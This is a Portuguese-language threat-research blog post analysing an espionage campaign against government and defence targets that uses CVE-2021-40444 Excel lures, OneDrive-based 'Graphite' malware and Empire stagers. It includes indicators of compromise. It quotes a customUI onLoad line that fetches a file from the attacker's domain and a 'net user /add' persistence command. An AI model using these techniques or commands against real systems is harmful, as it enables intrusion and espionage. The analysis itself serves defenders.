Faça um tour pelo produto Solicite uma demonstração Avaliação de segurança cibernética Fale conosco

Histórias

As últimas tendências em segurança cibernética, melhores práticas,
vulnerabilidades de segurança e muito mais

Gabinete do primeiro-ministro é comprometido: Detalhes da recente campanha de espionagem

Resumo executivo

Nossa equipe do Advanced Threat Research identificou uma campanha de espionagem em vários estágios visando funcionários de alto escalão do governo que supervisionam a política de segurança nacional e indivíduos no setor de defesa na Ásia Ocidental. Conforme detalhamos os componentes técnicos desse ataque, podemos confirmar que realizamos a divulgação pré-lançamento às vítimas e fornecemos todo o conteúdo necessário para remover todos os componentes de ataque conhecidos de seus ambientes.

A cadeia de infecções começa com a execução de um downloader do Excel, provavelmente enviado à vítima por e-mail, que explora uma vulnerabilidade de execução remota de código MSHTML (CVE-2021-40444) para executar um executável malicioso na memória. O ataque usa um malware de acompanhamento chamado Graphite porque usa a API Microsoft Graph para aproveitar o OneDrive como um servidor de comando e controle, técnica que nossa equipe não viu antes. Além disso, o ataque foi dividido em vários estágios para ficar o mais escondido possível.

As funções de comando e controle utilizaram um servidor Empire que foi preparado em julho de 2021, e a campanha atual ficou ativa de outubro a novembro de 2021. A postagem de blog abaixo explicará o funcionamento interno, vitimologia, infraestrutura e cronograma do ataque e, claro, revelará os IOCs e as técnicas do MITRE ATT&CK.

Alguns dos indicadores de ataque e objetivos geopolíticos aparentes se assemelham aos associados ao ator de ameaças APT28 descoberto anteriormente. Embora não acreditemos na atribuição de qualquer campanha com base exclusiva em evidência desse tipo, temos um nível moderado de confiança de que nossa suposição está correta. Dito isso, estamos extremamente confiantes de que estamos lidando com um ator muito habilidoso com base na forma como a infraestrutura, a codificação do malware e a operação foram configuradas.

Os clientes da Trellix estão protegidos por diversos produtos da McAfee Enterprise e da FireEye que foram fornecidos com esses indicadores.

Análise do processo de ataque

Esta seção fornece uma análise do processo geral do ataque, começando com a execução de um arquivo do Excel contendo uma exploração para a vulnerabilidade de execução remota de código MSHTML (CVE-2021-40444). Ela é usada para executar um arquivo DLL malicioso agindo como um downloader para o malware do terceiro estágio que chamamos de Graphite. O Graphite é uma amostra de malware recém-descoberta com base em um preparador OneDrive Empire que usa as contas do OneDrive como servidores de comando e controle através da API do Microsoft Graph.

As últimas fases deste ataque em vários estágios, que acreditamos estar associado a uma operação APT, inclui a execução de diferentes preparadores Empire para finalmente fazer download de um agente Empire nos computadores das vítimas e envolver o servidor de comando e controle para controlar remotamente os sistemas.

O diagrama a seguir mostra o processo geral do ataque.

Figura 1. Fluxo de ataque
Primeiro estágio: downloaders do Excel

Como sugerido, o primeiro estágio do ataque provavelmente usa um e-mail de spear phishing para fazer as vítimas abrirem um arquivo do Excel chamado “parliament_rew.xlsx”. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Documento em formato Excel Microsoft Office Open XML
Nome do arquivo parliament_rew.xlsx
Tamanho do arquivo 19,26 KB
Data da compilação 05/10/2021
MD5 8e2f8c95b1919651fcac7293cb704c1c
SHA-256 f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4

Figura 2. Texto chamariz observado no arquivo do Excel

Ao analisar a estrutura desse arquivo, observamos que ele inclui uma pasta chamada “customUI” que contém um arquivo chamado “customUI.xml”. Abrindo esse arquivo em um editor de texto, observamos que o documento malicioso usa a propriedade “CustomUI.OnLoad” do formato Open XML para carregar um arquivo externo a partir de um servidor remoto:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

Essa técnica permite que os atacantes contornem alguns mecanismo de varredura antivírus e ferramentas de análise de escritório, diminuindo as chances de os documentos serem detectados.

O arquivo baixado é novamente uma planilha do Excel, mas desta vez ele é salvo usando o antigo formato de arquivo binário do Microsoft Office Excel 97-2003 (.xls). Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Formato de arquivo binário do Microsoft Office Excel 97-2003
Nome do arquivo parliament_rew.xls
Tamanho do arquivo 20,00 KB
Data da compilação 05/10/2021
MD5 abd182f7f7b36e9a1ea9ac210d1899df
SHA-256 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a

Analisando os objetos de metadados, podemos identificar que o criador estava usando a página de código 1252 usada em países da Europa Ocidental e o arquivo foi criado em 5 de outubro de 2021.

Figura 3. Metadados de documento

Mais tarde, analisamos os objetos OLE no documento e descobrimos uma estrutura OLEStream de objeto vinculado que contém um link para a exploração da vulnerabilidade CVE-2021-40444 hospedada no servidor dos atacantes. Isso permite que o documento baixe automaticamente o arquivo HTML e, posteriormente, chame o mecanismo do Internet Explorer para interpretá-lo, desencadeando a execução da exploração.

Figura 4. Vínculo remoto no objeto OLE

Nesta postagem de blog, não examinaremos o mecanismo da vulnerabilidade CVE-2021-40444, pois isso já foi explicado e discutido publicamente. Em vez disso, continuaremos a análise sobre a DLL do segundo estágio contida no arquivo CAB da exploração.

Segundo estágio: downloader da DLL

O segundo estágio é uma DLL executável chamada fontsubc.dll que foi extraída do arquivo CAB usado na exploração mencionada acima. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Executável PE32 para Microsoft Windows (DLL) (console) Intel 80386 32-bit
Nome do arquivo fontsubc.dll
Tamanho do arquivo 88,50 KB
Data da compilação 28/09/2021
MD5 81de02d6e6fca8e16f2914ebd2176b78
SHA-256 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Esse arquivo exporta uma função chamada “CPlApplet” que o Windows reconhece como um aplicativo de painel de controle. Isso atua, principalmente, como um downloader para o malware do próximo estágio, que está localizado em hxxps://wordkeyvpload[.]net/keys/update[.]dat usando objetos COM e a API “URLOpenBlockingStreamW”.

Figura 5. Download do malware do próximo estágio

Depois de baixado o arquivo, o malware irá descriptografá-lo com uma chave pública RSA incorporada e verificar sua integridade calculando um SHA-256 da carga descriptografada. Finalmente, o malware aloca memória virtual, copia a carga para ela e a executa.

Figura 6. Detecção e execução da carga

Antes de executar a carga baixada, o malware irá comparar os quatro primeiros bytes com o valor mágico DE 47 AC 45 em hexadecimal; se forem diferentes, ele não executará a carga.

Figura 7. Valor mágico de malware

Terceiro estágio: malware Graphite

O terceiro estágio é uma DLL executável, que nunca é escrita em disco, chamada dfsvc.dll, que conseguimos extrair da memória no estágio anterior. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Executável PE32 para Microsoft Windows (DLL) (console) Intel 80386 32-bit
Nome do arquivo dfsvc.dll
Tamanho do arquivo 24,00 KB
Data da compilação 20/09/2021
MD5 0ff09c344fc672880fdb03d429c7bda4
SHA-256 f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Chamamos esse malware de Graphite porque ele usa a API do Microsoft Graph para usar o OneDrive como comando e controle. É muito provável que os desenvolvedores do Graphite tenham usado o preparador Empire OneDrive como referência devido às semelhanças da funcionalidade e da estrutura de arquivos usada na conta do OneDrive dos atores.

Figura 8. Solicitações de API do preparador Empire OneDrive

O grafite começa criando um mutex com o nome codificado “250gHJAWUI289382s3h3Uasuh289di” para evitar execuções duplas, descriptografar as sequências de caracteres e resolver dinamicamente as APIs que usará mais tarde. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Cryptography\MachineGuid”.

Figura 9. Inicializações do Graphite

Em seguida, o malware criará um thread para monitorar a execução de tarefas e carregar seus resultados para a conta do OneDrive. Os arquivos resultantes serão carregados na pasta “update” da conta do OneDrive dos atacantes.

Figura 10. Thread para monitorar os resultados da tarefa

Depois disso, o malware entrará em um loop infinito onde, a cada 20 minutos, ele obterá um novo token OAuth2 para usar com as solicitações de API do Microsoft Graph, e determinará se há novas tarefas para executar na pasta “check” da conta do OneDrive dos atacantes.

Figura 11. Solicitação de novo token OAuth2

Uma vez obtido um token OAuth2 válido, os dados de reconhecimento são coletados contendo as seguintes informações dos sistemas das vítimas:

  • Execução de processos
  • Versões .NET CLR do PowerShell
  • Versão do SO Windows

Os dados são compactados usando o algoritmo LZNT1 e criptografados com uma chave AES-256-CBC codificada com uma IV aleatória. As tarefas do operador são codificadas da mesma forma. Finalmente, o arquivo contendo as informações do sistema é carregado para a pasta “{BOT_ID}/update” no OneDrive com um nome aleatório.

Figura 12. Dados de codificação do Graphite

O Grafite também consultará novos comandos enumerando os arquivos filhos no subdiretório “check”. Se um novo arquivo for encontrado, ele usará a API Microsoft Graph para baixar o conteúdo do arquivo e descriptografá-lo. As tarefas descriptografadas têm dois campos; o primeiro é um identificador único da tarefa e o segundo especifica o comando a ser executado.

O valor de comando “1” instruirá o malware a enviar as informações do sistema para o comando e controle novamente, que é o OneDrive dos atacantes. O valor de comando “2” indica que a tarefa descriptografada é um shellcode, e o malware criará um thread para executá-lo.

Figura 13. Comandos do Graphite

Se a tarefa recebida for um shellcode, ele verificará o terceiro campo com o valor mágico DE 47 AC 45 em hexadecimal e, se forem diferentes, ele não executará a carga. O resto dos bytes da tarefa é o shellcode que será executado. Finalmente, os arquivos da tarefa são apagados do OneDrive após serem processados.

Figura 14. Tarefa de operador descriptografada

O diagrama abaixo resume o fluxo do malware Graphite.

Figura 15. Diagrama de execução do Graphite

Quarto estágio: preparador Empire DLL Launcher

O quarto estágio é um arquivo de biblioteca dinâmica chamado csiresources.dll que conseguimos extrair de uma tarefa da etapa anterior. O arquivo foi incorporado em uma tarefa de shellcode de grafite usada para carregar reflexivamente o executável na memória do processo e executá-lo. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Executável PE32 para Microsoft Windows (DLL) (console) Intel 80386 32-bit
Nome do arquivo csiresources.dll
Tamanho do arquivo 111,00 KB
Data da compilação 21/09/2021
MD5 138122869fb47e3c1a0dfe66d4736f9b
SHA-256 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

A amostra é um preparador Empire DLL Launcher gerado que irá inicializar e iniciar o tempo de execução .NET CLR em um processo não gerenciado para executar um suporte de download para a atuação de um agente Empire. Com isso, é possível executar o agente Empire em um processo que não seja o PowerShell.exe.

Primeiro, o malware verificará se o malware está sendo executado a partir do processo explorer.exe. Se não estiver, o malware é encerrado.

Figura 16. Verificação de nomes de processos

Em seguida, o malware tenta encontrar o arquivo “EhStorShell.dll” nas pasta System32 e carregá-lo. Com isso, o malware se certifica de que o arquivo original “EhStorShell.dll” seja carregado no contexto do explorer.exe.

Figura 17. Carregando a biblioteca EhStorShell.dll

A operação anterior é importante porque o malware de acompanhamento substituirá o CLSID “{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}” para obter persistência no sistema das vítimas, realizando uma técnica de sequestro COM. O CLSID acima mencionado corresponde à “DLL de extensão do shell do armazenamento avançado” e é manipulado pelo arquivo “EhStorShell.dll”.

A seguir, o malware carregará, inicializará e iniciará o tempo de execução .NET CLR, usará o XOR para descriptografar a carga .NET do próximo estágio e a carregará na memória. Por fim, ele executará o arquivo usando o tempo de execução .NET.

Figura 18. Descriptografia do malware do próximo estágio

Quinto estágio: preparador Empire PowerShell C#

O quinto estágio é um executável .NET chamado Service.exe que foi incorporado e criptografado no estágio anterior. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Executável PE32 para Microsoft Windows (console) Intel 80386 32 bits
Tamanho do arquivo 34,00 KB
MD5 3b27fe7b346e3dabd08e618c9674e007
SHA-256 d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Essa amostra é um preparador Empire PowerShell C# cujo principal objetivo é criar uma instância de um objeto PowerShell, descriptografar o script PowerShell incorporado usando operações XOR e decodificá-lo com base64 antes de finalmente executar a carga com a função de invocação.

Figura 19. Código do quinto estágio

A razão por trás do uso de um executável .NET para carregar e executar o código PowerShell é contornar medidas de segurança como a AMSI, permitindo a execução de um processo que não deveria ser permitido.

Sexto estágio: preparador Empire HTTP Powershell

O último estágio é um script PowerShell, mais especificamente um preparador Empire HTTP, que foi incorporado e criptografado no estágio anterior. Abaixo você pode ver as informações de identificação do arquivo:

Tipo de arquivo Script do PowerShell
Tamanho do arquivo 6,00 KB
MD5 a81fab5cf0c2a1c66e50184c38283e0e
SHA-256 da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

Como mencionamos anteriormente, este é o último estágio do ataque em vários estágios, e trata-se de um preparador HTTP fortemente ocultado usando o script Invoke-Obfuscation do Empire para dificultar a análise.

Figura 20. Script PowerShell ocultado

A principal funcionalidade do script é entrar em contato com hxxp://wordkeyvpload[.]org/index[.]jsp para enviar as informações iniciais sobre o sistema e conectar-se à URL hxxp://wordkeyvpload[.]org/index[.]php para baixar o agente Empire criptografado, descriptografá-lo com AES-256 e executá-lo.

Linha do tempo dos eventos

Com base em todas as atividades monitoradas e analisadas, fornecemos a seguinte linha do tempo dos eventos:

Figura 21. Linha do tempo da campanha

Alvos

Um dos documentos chamarizes que mencionamos antes (chamado “parliament_rew.xlsx”) pode ter sido direcionado a funcionários do governo.

Além de direcionado a entidades governamentais, parece que esse adversário também está de olho na indústria de defesa. Outro documento com o nome “Missions Budget.xlsx” continha o texto “Missões e operações militares e civis” e os orçamentos em dólares para as operações militares em alguns países para os anos de 2022 e 2023.

Figura 22. Documento chamariz direcionado ao setor de defesa

Além disso, a partir da nossa telemetria, também observamos que a Polônia e outros países do Leste Europeu eram de interesse dos atores por trás dessa campanha.

A vitimologia completa dos atores é desconhecida, mas os documentos chamarizes que vimos mostram que suas atividades estão centradas em regiões e indústrias específicas. Com base nos nomes, no conteúdo dos arquivos maliciosos do Excel e na nossa telemetria, parece que os atores estão mirando países da Europa Oriental e as indústrias mais predominantes são as públicas e as de defesa.

Infraestrutura

Graças à análise da cadeia de ataque completa, dois hosts relacionados ao ataque foram identificados. O primeiro domínio é wordkeyvpload.net que resolve o IP 131.153.96.114, localizado na Sérvia e registrado em 7 de julho de 2021 com a OwnRegistrar Inc.

Consultando o IP com uma ferramenta de busca DNS reversa, um registro PTR foi obtido resolvendo o domínio “bwh7196.bitcoinwebhosting.net”, o que poderia ser uma indicação de que o servidor foi comprado da empresa revendedora de VPS Bitcoin Web Hosting.

Figura 23. Consulta DNS reversa

A principal funcionalidade deste servidor de comando e controle é hospedar a exploração HTML para CVE-2021-40444 e o arquivo CAB contendo a DLL de segundo estágio.

O segundo domínio identificado é wordkeyvpload.org que resolve o IP 185.117.88.19, localizado na Suécia e registrado em 18 de junho de 2021 com a Namecheap Inc. Com base no sistema operacional (Microsoft Windows Server 2008 R2), o servidor HTTP (Microsoft-IIS/7.5) e as portas abertas (1337 e 5000) é muito provável que o host esteja executando a versão mais recente da estrutura de pós-exploração Empire.

A razão por trás dessa hipótese é que a configuração padrão dos servidores Empire usa a porta 1337 para hospedar uma API RESTful e a porta 5000 hospeda uma interface SocketIO para interagir remotamente com o servidor. Além disso, ao distribuir um ouvinte HTTP, o valor padrão para o campo de servidor HTTP é codificado com “Microsoft-IIS/7.5”.

Figura 24. Execução do servidor Empire local com configuração padrão

Com as informações acima mencionadas, bem como a extração do comando e controle do último estágio do malware, podemos confirmar que este host age como um servidor Empire usado para controlar remotamente os agentes instalados nas máquinas das vítimas e enviar comandos para executá-los.

Responsabilidade

Durante a linha do tempo da operação, houve algumas tensões políticas relacionadas à fronteira entre a Armênia e o Azerbaijão. Portanto, do ponto de vista de uma operação de inteligência clássica, faria todo o sentido se infiltrar e coletar informações para avaliar os riscos e movimentos das diferentes partes envolvidas.

Ao longo de nossa pesquisa sobre a campanha do Graphite, extraímos todos os carimbos de data/hora de atividade dos atacantes de nossa telemetria e encontramos duas tendências consistentes. Primeiro, os dias de atividade do adversário são de segunda a sexta, conforme ilustra a imagem abaixo:

Figura 25. Dias de atividade do adversário

Segundo, os carimbo de data/hora de atividade correspondem ao horário comercial normal (das 8h às 18h) no fuso horário GMT+3, que inclui horário de Moscou, horário da Turquia, horário padrão da Arábia e horário da África Oriental.

Figura 26. Horários de atividade do adversário

Outra descoberta interessante durante a investigação foi a de que os atacantes estavam usando o CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) para persistência, o que correspondeu a um relatório do ESET no qual os pesquisadores mencionaram uma operação russa direcionada a países do Leste Europeu.

Analisando e comparando sequências e blocos de código do malware Graphite com nosso banco de dados de amostras, descobrimos sobreposições com amostras em 2018 sendo atribuídas ao APT28. Comparamos, por exemplo, nossas amostras com esta: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):

Figura 27. Comparação de código de amostras

Quando analisamos mais detalhadamente algumas das funções, observamos no lado esquerdo da imagem abaixo a amostra do Graphite e à direita a amostra mencionada de 2018. Com quase três anos de diferença, faz sentido que o código tenha mudado, mas ainda parece que o programador estava satisfeito com algumas das funções anteriores:

Figura 28. Fluxo de funções semelhante

Embora tenhamos mencionado algumas táticas, técnicas e procedimentos (TTPs) dos atores por trás dessa campanha, simplesmente não temos contexto, semelhanças ou sobreposições suficientes para nos apontar com alguma confiança para o APT28, muito menos para um país patrocinador. Dito isso, acreditamos que estamos lidando com um ator habilidoso com base na forma como a infraestrutura, a codificação do malware e a operação foram configuradas.

Conclusão

A análise da campanha descrita nesta postagem de blog nos permitiu reunir insights sobre um ataque em vários estágios realizado no início de outubro, aproveitando a vulnerabilidade de execução remota de código MSHTML (CVE-2021-40444) para atingir países do Leste Europeu.

Como visto na análise do malware Graphite, uma funcionalidade bastante inovadora é o uso do serviço OneDrive como comando e controle através da consulta da API Microsoft Graph com um token codificado no malware. Esse tipo de comunicação permite que o malware passe despercebido nos sistemas das vítimas, pois ele só se conectará a domínios legítimos da Microsoft e não mostrará nenhum tráfego de rede suspeito.

Graças à análise do processo de ataque completo, conseguimos identificar novas infraestruturas atuando como comando e controle dos atores e a carga final, que é um agente da estrutura de pós-exploração Empire. Tudo isso nos permitiu construir uma linha do tempo da atividade observada na campanha.

Os atores por trás do ataque parecem muito avançados, com base no direcionamento, no malware e na infraestrutura usada na operação, por isso presumimos que o principal objetivo dessa campanha é a espionagem. Com confiança baixa e moderada, acreditamos que a operação foi executada pelo APT28. Para prosseguir com a investigação, fornecemos algumas táticas, técnicas e procedimentos (TTPs), indicadores sobre a infraestrutura, direcionamento e recursos para detectar essa campanha.

Técnicas do MITRE ATT&CK

Tática
Resource Development T1583.001 Acquire Infrastructure: Domains Os atacantes compraram domínios para serem usados como comando e controle. wordkeyvpload[.]net
wordkeyvpload[.]org
Resource Development T1587.001 Develop capabilities: Malware Os atacantes construíram componentes maliciosos para conduzir seu ataque. Malware Graphite
Resource Development T1588.002 Develop capabilities: Tool Os atacantes usaram ferramentas de equipe vermelha para conduzir seu ataque. Empire
Initial Access T1566.001 Phishing: Spear phishing Attachment Os adversários enviaram e-mails de spear phishing com um anexo malicioso para obter acesso aos sistemas das vítimas. BM-D(2021)0247.xlsx
Execution T1203 Exploitation for Client Execution Os adversários exploraram uma vulnerabilidade no Microsoft Office para executar o código. CVE-2021-40444
Execution T1059.001 Command and Scripting Interpreter: PowerShell Os adversários abusaram do PowerShell para a execução do preparador Empire. Preparador Empire Powershell
Persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking Os adversários estabeleceram persistência executando conteúdo malicioso ativado por referências sequestradas a objetos COM (Component Object Model). CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D
Persistence T1136.001 Create Account: Local Account Os adversários criaram uma conta local para manter o acesso aos sistemas das vítimas. net user /add user1
Defense Evasion T1620 Reflective Code Loading Os adversários carregaram código reflexivamente em um processo para ocultar a execução de cargas maliciosas. Preparador Empire DLL Launcher
Command and Control T1104 Multi-Stage Channels Os adversários criaram vários estágios para ocultar o canal de comando e controle e dificultar a detecção. Uso de diferentes preparadores Empire
Command and Control T1102.002 Web Service: Bidirectional Communication Os adversários usaram um serviço Web externo existente e legítimo como um meio de enviar comandos e receber saída de um sistema comprometido pelo canal do serviço Web. Microsoft OneDrive
Servidor Empire
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography Os adversários empregaram um conhecido algoritmo de criptografia simétrica para ocultar o tráfego de comando e controle, em vez de confiar em quaisquer proteções inerentes fornecidas por um protocolo de comunicação. AES 256
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptography Os adversários empregaram um conhecido algoritmo de criptografia assimétrica para ocultar o tráfego de comando e controle, em vez de confiar em quaisquer proteções inerentes fornecidas por um protocolo de comunicação. RSA

Indicadores de comprometimento (IoCs)

Primeiro estágio: downloaders do Excel
40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0

Segundo estágio: DLL do downloader
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Terceiro estágio: Graphite
35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Quarto estágio: preparador DLL Launcher
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

Quinto estágio: preparador PowerShell C#
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Sexto estágio: preparador Empire HTTP Powershell
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

URLs
hxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls
hxxps://wordkeyvpload[.]net/keys/parliament_rew.xls
hxxps://wordkeyvpload[.]net/keys/Missions Budget.xls
hxxps://wordkeyvpload[.]net/keys/TR_comparison.xls

hxxps://wordkeyvpload[.]net/keys/JjnJq3.html
hxxps://wordkeyvpload[.]net/keys/iz7hfD.html
hxxps://wordkeyvpload[.]net/keys/Ari2Rc.html
hxxps://wordkeyvpload[.]net/keys/OD4cNq.html

hxxps://wordkeyvpload[.]net/keys/0YOL4.cab
hxxps://wordkeyvpload[.]net/keys/whmel.cab
hxxps://wordkeyvpload[.]net/keys/UdOpQ.cab
hxxps://wordkeyvpload[.]net/keys/D9V5E.cab

hxxps://wordkeyvpload[.]net/keys/update.dat

hxxps://wordkeyvpload[.]org/index.jsp
hxxps://wordkeyvpload[.]org/index.php
hxxps://wordkeyvpload[.]org/news.php
hxxps://wordkeyvpload[.]org/admin/get.php
hxxps://wordkeyvpload[.]org/login/process.php

Domínios
wordkeyvpload[.]net
wordkeyvpload[.]org
jimbeam[.]live

IPs
131.153.96[.]114
185.117.88[.]19
94.140.112[.]178

Veja as últimas novidades

Nós conhecemos bem a segurança cibernética. Porém, somos uma empresa jovem.
Mantenha-se informado enquanto evoluímos.

Digite um endereço de e-mail válido.
Nenhum spam. Cancele a assinatura a qualquer momento.